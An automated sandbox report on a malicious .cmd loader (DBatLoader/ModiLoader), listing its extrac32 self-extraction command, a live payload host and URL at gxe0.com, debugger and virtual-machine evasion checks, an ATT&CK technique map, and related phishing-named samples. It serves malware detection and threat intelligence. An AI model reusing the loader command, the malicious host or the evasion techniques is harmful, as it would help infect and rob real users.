                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2B80000 memory commit 500006912Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2B81000 memory commit 500178944Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2BAC000 memory commit 500002816Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2BAD000 memory commit 500199424Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2BDE000 memory commit 501014528Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2CD6000 memory commit 500006912Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2CD8000 memory commit 500015104Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02B858B4
                    Source: Amcache.hve.8.drBinary or memory string: VMware
                    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                    Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: x.exe, 00000004.00000002.1593176423.0000000000700000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1593176423.0000000000716000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: x.exe, 00000004.00000002.1593176423.0000000000716000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                    Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_4-25442

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B9EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_02B9EBF0
                    Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B987A0 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02B987A0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02B85A78
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02B8A798
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02B8A74C
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02B85B84
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B89194 GetLocalTime,4_2_02B89194
                    Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B8B714 GetVersionExA,4_2_02B8B714
                    Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts
                    1
                    Native API
                    1
                    Valid Accounts
                    1
                    Valid Accounts
                    1
                    Valid Accounts
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    11
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    1
                    Access Token Manipulation
                    LSASS Memory321
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
                    Process Injection
                    1
                    Virtualization/Sandbox Evasion
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading
                    11
                    Process Injection
                    NTDS1
                    System Network Connections Discovery
                    Distributed Component Object ModelInput Capture113
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    File and Directory Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information
                    Cached Domain Credentials24
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582694 Sample: PO#5_tower_Dec162024.cmd Startdate: 31/12/2024 Architecture: WINDOWS Score: 88 23 gxe0.com 2->23 27 Found malware configuration 2->27 29 Multi AV Scanner detection for submitted file 2->29 31 Yara detected DBatLoader 2->31 33 2 other signatures 2->33 8 cmd.exe 1 2->8         started        signatures3 process4 process5 10 x.exe 8->10         started        14 extrac32.exe 8 8->14         started        17 conhost.exe 8->17         started        dnsIp6 25 gxe0.com 198.252.105.91, 443, 49706, 49707 HAWKHOSTCA Canada 10->25 35 Multi AV Scanner detection for dropped file 10->35 37 Allocates many large memory junks 10->37 39 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 10->39 19 WerFault.exe 19 16 10->19         started        21 C:\Users\user\AppData\Local\Temp\x.exe, PE32 14->21 dropped file7 signatures8 process9

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    PO#5_tower_Dec162024.cmd39%ReversingLabsWin32.Trojan.ModiLoader
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\x.exe50%ReversingLabsWin32.Trojan.ModiLoader
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://gxe0.com:443/yak2/228_Dlwloedmcwb0%Avira URL Cloudsafe
                    https://gxe0.com/yak2/228_Dlwloedmcwb0%Avira URL Cloudsafe
                    https://gxe0.com/0%Avira URL Cloudsafe
                    https://gxe0.com/yak2/228_Dlwloedmcwb7z0%Avira URL Cloudsafe
                    https://gxe0.com/yak2/228_Dlwloedmcwb?0%Avira URL Cloudsafe
                    https://gxe0.com/yak2/228_Dlwloe0%Avira URL Cloudsafe
                    https://gxe0.com/yak2/228_Dlwloedmcwbxell0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    gxe0.com
                    198.252.105.91
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://gxe0.com/yak2/228_Dlwloedmcwbtrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://gxe0.com/yak2/228_Dlwloedmcwb7zx.exe, 00000004.00000002.1593176423.0000000000716000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://gxe0.com/yak2/228_Dlwloedmcwbxellx.exe, 00000004.00000002.1593176423.0000000000700000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://upx.sf.netAmcache.hve.8.drfalse
                        high
                        https://gxe0.com:443/yak2/228_Dlwloedmcwbx.exe, 00000004.00000002.1593176423.000000000073D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://gxe0.com/yak2/228_Dlwloedmcwb?x.exe, 00000004.00000002.1593176423.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://gxe0.com/yak2/228_Dlwloex.exe, 00000004.00000002.1611343885.0000000020ACD000.00000004.00001000.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://gxe0.com/x.exe, 00000004.00000002.1593176423.0000000000733000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        198.252.105.91
                        gxe0.comCanada
                        20068HAWKHOSTCAfalse
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1582694
                        Start date and time:2024-12-31 09:43:11 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 49s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:PO#5_tower_Dec162024.cmd
                        Detection:MAL
                        Classification:mal88.troj.evad.winCMD@7/6@2/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 26
                        • Number of non-executed functions: 38
                        Cookbook Comments:
                        • Found application associated with file extension: .cmd
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 52.182.143.212, 52.168.117.173, 40.126.32.133, 4.245.163.56
                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: PO#5_tower_Dec162024.cmd
                        TimeTypeDescription
                        03:44:09API Interceptor1x Sleep call for process: x.exe modified
                        03:44:27API Interceptor1x Sleep call for process: WerFault.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        198.252.105.91DHL-INVOICE-MBV.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        gxe0.comC6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                        • 198.252.105.91
                        2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                        • 198.252.105.91
                        RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                        • 198.252.105.91
                        IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                        • 198.252.105.91
                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                        • 198.252.105.91
                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                        • 198.252.105.91
                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                        • 198.252.105.91
                        x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                        • 198.252.105.91
                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                        • 198.252.105.91
                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                        • 198.252.105.91
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        HAWKHOSTCAC6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                        • 198.252.105.91
                        2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                        • 198.252.105.91
                        Payroll List.exeGet hashmaliciousFormBookBrowse
                        • 198.252.98.54
                        RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                        • 198.252.105.91
                        IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                        • 198.252.105.91
                        MV KODCO.exeGet hashmaliciousFormBookBrowse
                        • 198.252.98.54
                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                        • 198.252.105.91
                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                        • 198.252.105.91
                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                        • 198.252.98.54
                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                        • 198.252.98.54
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        a0e9f5d64349fb13191bc781f81f42e1x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                        • 198.252.105.91
                        re5.mp4.htaGet hashmaliciousLummaCBrowse
                        • 198.252.105.91
                        Poket.mp4.htaGet hashmaliciousLummaCBrowse
                        • 198.252.105.91
                        Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                        • 198.252.105.91
                        Set-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                        • 198.252.105.91
                        Setup.exeGet hashmaliciousLummaCBrowse
                        • 198.252.105.91
                        X-mas_2.3.2.exeGet hashmaliciousLummaCBrowse
                        • 198.252.105.91
                        ReploidReplic.exeGet hashmaliciousLummaCBrowse
                        • 198.252.105.91
                        Bootstrapper.exeGet hashmaliciousLummaCBrowse
                        • 198.252.105.91
                        Launcher.exeGet hashmaliciousLummaCBrowse
                        • 198.252.105.91
                        No context
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):1.0938670565180482
                        Encrypted:false
                        SSDEEP:192:Izq6CDnb0BU/gj7F6N1hbzuiFcZ24IO8UZW:Gq6wnoBU/gjCbzuiFcY4IO8UZ
                        MD5:CE43F5DD9C5FFC273403683F68C5719D
                        SHA1:3724AE41326667750D52B27E8451102386270DA4
                        SHA-256:8540E140B4C8382B2C158A4EDB05B344A0FBD80D9877A014A9F81A53287FDB54
                        SHA-512:07D67636570019CC5DAB92EDC45E3C8AE0787CB152567881EE9ADB1146448DE5A83A95DD1787F8728F841F8E3828F4AEA12EF5A2D271DABC9EBC80009D6ABB70
                        Malicious:false
                        Reputation:low
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.0.8.2.5.7.4.8.9.0.9.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.0.8.2.6.0.2.3.9.0.8.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.9.a.d.5.b.e.-.1.6.4.5.-.4.1.0.8.-.b.4.5.6.-.5.d.a.8.e.d.9.9.0.4.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.8.5.5.a.5.8.-.7.4.b.0.-.4.8.6.c.-.8.4.c.a.-.2.f.8.d.8.6.3.6.7.3.3.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.4.-.0.0.0.1.-.0.0.1.4.-.a.3.1.f.-.9.9.2.8.6.0.5.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.2.8.2.e.3.f.f.7.a.5.4.c.2.a.2.8.8.8.d.c.7.4.3.5.c.5.0.7.4.6.0.0.0.0.0.9.0.4.!.0.0.0.0.a.9.2.5.6.9.c.5.a.a.d.2.7.3.4.8.c.d.c.0.8.4.b.3.b.6.8.9.a.4.e.2.8.e.e.c.1.c.9.a.!.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.9.2././.0.6././.1.9.:.2.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Tue Dec 31 08:44:19 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):128668
                        Entropy (8bit):2.0693616279428264
                        Encrypted:false
                        SSDEEP:384:5IVaEOqbMaE4QxxId1pFaqp20fRZNgLsG3d8MCp+TB4T8agYD/Sp82TtbVAHEC:UF5E4Qxxo3Um2OvNgLX2/bAt6CBXA
                        MD5:A6485C432C150C3CCEA4E0F28BE57DC6
                        SHA1:59C1FB4DE3B72E772CA00AAE78B1E6D4BD926860
                        SHA-256:07F43F29DD66284E8F7ABC5792708A15D882C1CF43F2418684B9649BFD7A3CDA
                        SHA-512:E2E72F7C9D86DF42878188840034DFB2E8E0764F84EC2BE23D1664B206819D50530C6B5A18BE3490BB4DA894F071F75504587127BF9BB50B34B43298CC949285
                        Malicious:false
                        Reputation:low
                        Preview:MDMP..a..... ........sg............D........... ...X...........x&...........Z..........`.......8...........T............T...............)...........*..............................................................................eJ.......+......GenuineIntel............T............sg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8270
                        Entropy (8bit):3.6935067441795693
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJb5+6FcSNi6YsQKSMgmf14cffprT89bnssf4Nm:R6lXJt+6VNi6YZKSMgmf14c+n/fP
                        MD5:A56AC4874FAD286C6C9653C891592442
                        SHA1:12FA8960ECD37F83344D03F3763D7DFFE27F2C54
                        SHA-256:9E1A15B1DBBEB5CEB3AEDB96FA192C992323D417DC956CED6722BDECC8343200
                        SHA-512:76FBC6E4CE5F14D9B5093798DA83387E03BB976FC8BE697CFE5668BCE41CA16E56866E794F9F4534E1CD6E346BCD206A400E76E783053925B8FA437CBD1A852C
                        Malicious:false
                        Reputation:low
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.8.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4564
                        Entropy (8bit):4.454536772653565
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsnQJg77aI9iksnWpW8VYNYm8M4JzPJFkc+q8metXGSwJzhQd:uIjfWI7Rx7VBJUcc2SwJzhQd
                        MD5:FA02AA26115DEB789DB83388C4D11FD8
                        SHA1:CEB003708DD32FA2DEF5E7D49FAC8905A05753DB
                        SHA-256:404D6F003D869353B2A5FA94F33906222AA3314A68E1A3C85E649D68B71BDDC0
                        SHA-512:53E4FC2C83C7B964ED468496E95EC56EE38B1C24437D09767AF2A4CD9770A02A0A5191FD15AC93F25C04983F1757C4F80CA90BC2D21E7198DF69D2574C7159A9
                        Malicious:false
                        Reputation:low
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="655187" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\System32\extrac32.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):953856
                        Entropy (8bit):7.036454476387899
                        Encrypted:false
                        SSDEEP:24576:Z7sP5Kw0G1OAc8msbN0o2jDGHfPMFQJQI/zNz:Z8o9G1bwcfPMFQJQI/zNz
                        MD5:6C1C692B2DE02C5CE02A5D2D27117851
                        SHA1:A92569C5AAD27348CDC084B3B689A4E28EEC1C9A
                        SHA-256:2A963D521B95C852076935883CFC674EA8FC09501581F85A066EA1EF30F4516B
                        SHA-512:AD70CFD6C08DDF55120B1C35059313B5FCA9FD38104FDFF92E8B4ECB420074CBCA736E61598AC1C1DD781AC36E128577498D2561C82209AB94BFAD29EE1866D6
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
